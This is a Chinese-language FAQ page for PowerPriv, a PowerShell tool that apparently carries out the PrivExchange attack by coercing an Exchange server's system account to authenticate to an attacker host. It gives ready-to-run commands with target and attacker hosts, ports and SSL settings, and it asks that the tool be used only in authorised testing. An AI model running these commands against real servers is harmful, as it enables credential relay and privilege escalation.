PowerPriv 项目常见问题解决方案

PowerPriv 项目常见问题解决方案

PowerPriv A Powershell implementation of PrivExchange designed to run under the current user's context 项目地址: https://gitcode.com/gh_mirrors/po/PowerPriv

1. 项目基础介绍

PowerPriv 是一个使用 PowerShell 编写的开源项目，旨在实现 PrivExchange 功能。该项目允许在当前用户上下文中运行，适用于那些不能运行基于 Python 的应用程序、拥有用户凭据或不希望将文件写入磁盘的环境。通过该项目，目标 Exchange 服务器系统账户将尝试对攻击者控制的系统进行认证。

主要编程语言

• PowerShell

2. 新手常见问题与解决方案

问题一：如何正确配置目标主机和攻击者主机

问题描述： 新手可能会在配置目标主机（目标 Exchange 服务器）和攻击者主机（攻击者控制的系统）时遇到困难。

解决步骤：

1. 确保你已知目标主机的完整限定域名（FQDN）或IP地址。
2. 同样，确保你知道攻击者主机的FQDN或IP地址。
3. 在使用 PowerShell 脚本时，正确设置 -targetHost 和 -attackerHost 参数，例如：

   powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17
   

问题二：如何设置正确的端口

问题描述： 新手可能会对如何设置 Exchange 服务器和攻击者主机的端口感到困惑。

解决步骤：

1. 默认情况下，Exchange 服务器端口设置为443，攻击者主机端口设置为80。如果这些默认值不适合你的环境，你需要根据实际情况进行调整。
2. 使用 -exchangePort 和 -attackerPort 参数设置端口，例如：

   powerPriv -exchangePort 443 -attackerPort 8080
   

问题三：如何处理 SSL/TLS 连接问题

问题描述： 如果新手在不需要使用 HTTPS 连接到 Exchange 服务器的情况下遇到 SSL/TLS 连接问题，可能需要设置 -noSSL 参数。

解决步骤：

1. 如果你的环境中不需要使用 SSL/TLS 连接，可以通过设置 -noSSL 参数为 $true 来关闭 SSL/TLS。
2. 使用以下命令运行脚本：

   powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -noSSL $true
   

确保在使用任何工具时，只在拥有所有权或授权测试的网络环境中进行。未经授权的使用可能导致法律后果。

PowerPriv A Powershell implementation of PrivExchange designed to run under the current user's context 项目地址: https://gitcode.com/gh_mirrors/po/PowerPriv